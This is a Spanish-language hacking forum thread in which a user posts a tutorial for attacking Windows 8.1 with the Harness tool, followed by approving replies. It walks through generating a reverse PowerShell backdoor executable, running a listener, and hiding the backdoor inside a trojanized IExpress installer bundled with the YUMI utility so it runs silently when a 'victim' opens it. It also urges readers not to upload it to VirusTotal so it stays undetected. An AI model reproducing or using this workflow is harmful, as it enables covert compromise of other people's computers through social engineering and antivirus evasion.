comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Atacando Windows 8.1 Pro con Harness

  • 5 Respuestas
  • 4515 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« en: Diciembre 20, 2015, 08:45:58 pm »

Saludos amigos en este pequeño tutorial atacaremos un sistema windows 8.1 x86 con la herramienta harness.


Harness fue presentada en la DEFCON23 esta tool nos permite generar payload de acceso remoto con la capacidad de proporcioanar una interfaz de control remoto de powershell.

Vamos a ello.

Clonamos el proyecto desde Github

Código: [Seleccionar]
git clone https://github.com/rich5/Harness
Para la instalacion de la herramienta ejecutaremos los siguientes comandos.

Código: [Seleccionar]
cd Harness
chmod 755 python_install.sh
./python_install.sh

Código: [Seleccionar]
wget http://python.org/ftp/python/3.4.3/Python-3.4.3.tar.xz
tar xf Python-3.4.3.tar.xz
cd Python-3.4.3
./configure --prefix=/usr/local --enable-shared LDFLAGS="-Wl,-rpath /usr/local/lib"
make && make altinstall


Tambien se ha corregido el bug con el autocompletado, para eso ejecuta los siguientes comando

Código: [Seleccionar]
apt-get install libssl-dev openssl
apt-get install python3-pip
apt-get install libcurses5-dev
pip3 install readline
python_install.sh

Ahora si stuxnet atack !!! xD

Ejecutamos harness de la siguiente manera

Código: [Seleccionar]
python3.4 harness.py

Ahora listaremos los módulos de la tool de la siguiente manera

Código: [Seleccionar]
show modules

En este caso usare el ultimo payload ya que el windows que atacare es x86, para eso lo cargaremos de la siguiente manera.

Código: [Seleccionar]
load payloads/TCP/x86/exe/Harness_x86
y para ver sus opciones

Código: [Seleccionar]
show options

Ahora procederemos a configurarlo, IP = su ip y PORT el puerto que usaran en mi caso usare el 4444


ahora ya configurado todo ejecutamos el comando run y nos preguntara un nombre en mi caso underc0de.exe, se guardara en la carpeta de harness.


Ahora ejecutamos el comando back y procederemos a configurar el handler


Código: [Seleccionar]
load handlers/PSHandler
ahora lo procederemos a configurarlo

IP = Su IP
PORT = su puerto
SSL = false


Ahora si ejecutamos run y tendremos en escucha nuestro handler xD ahora es hora de hacer un poco de ingeniería social y les mostrare un pequeño método.


IExpress, creador de instaladores :3

Esta tool es nativa desde windows XP que nos permite crear archivos comprimidos y autoinstaladores.

Para esto utilizaremos cualquier aplicación que deseemos, en mi caso utilizare YUMI una simple tool para crear usb boteables y el backdoor


y ahora el tipico siguiente


En esta parte nos pedirá agregar las dos aplicaciones que deseamos :3


y ahora siguiente y configuramos de la siguiente manera para que el backdoor se ejecute en segundo plano


Luego en siguiente y dejamos esto asi


y le ahora siguiente  nos preguntara donde queremos guardar y luego terminar :3 y se genera nuestro autoinstalador para pasarselo a la victima


Ahora cuando nuestra victima ejecute el programa se abrira la aplicación de YUMI y por debajo el backdoor asi dando nuestra session de powershell !!!!


ahora ejecutamos para ver nuestras sesiones

Código: [Seleccionar]
show sessions

Para interactuar con nuestra sesión lo hacemos de la siguiente forma y Fuegoooo en la cocinaa :3 lo que pase después esta en su imaginación.

Código: [Seleccionar]
session 1


Nota: No subaan nada a virustotaaal no quemen esta maravillosa herramienta aun en desarrollo

Bytes:

« Última modificación: Diciembre 21, 2015, 11:14:51 am por Stuxnet »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Diciembre 21, 2015, 09:52:40 am »
Que buen aporte @Stuxnet!! Se ve genial bro!
Felicitaciones por el material!

Saludos!
ANTRAX


Desconectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 870
  • Actividad:
    1.67%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #2 en: Diciembre 21, 2015, 04:58:11 pm »
Muy buen material @Stuxnet, gracias por compartir.

Seria bueno saber que podría atacarse cualquier otra versión de windows con esta maravillosa herramienta.

Saludos y gracias una vez mas.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #3 en: Diciembre 21, 2015, 05:14:18 pm »
Realmente se podria hasta con windows 10 y 7 lo hice con el 8.1 porque ya tenia montada la virtual. En todo caso solo seria de cambiar el payload para x64 o x86 y empezar a jugar con ella, como mencione todo esta en su imaginacion :3

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
« Respuesta #4 en: Diciembre 21, 2015, 06:09:11 pm »
Muy buen tutorial y buena app ahí van mis +1 @Stuxnet!

Saludos.



Desconectado venom404

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
  • I´m here!!
    • Ver Perfil
« Respuesta #5 en: Diciembre 23, 2015, 11:55:07 pm »
Madre mia.. Muy buen aporte de invasion..
Fire bomb!!! :o

 

¿Te gustó el post? COMPARTILO!



Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 2209
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 3254
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
Usando Javascript para ejecutar tareas en Windows [cmd]

Iniciado por Jimeno

Respuestas: 4
Vistas: 10823
Último mensaje Octubre 12, 2014, 07:10:26 pm
por syskc0
Obtener GUI tras explotar Windows XP con Metasploit y meterpreter

Iniciado por Jimeno

Respuestas: 4
Vistas: 3632
Último mensaje Febrero 16, 2013, 05:41:53 pm
por ANTRAX
Linux v.s Windows. ¿Cual es mejor para hacking.?

Iniciado por Cl0udswX

Respuestas: 12
Vistas: 4526
Último mensaje Abril 05, 2014, 08:01:32 pm
por Cl0udswX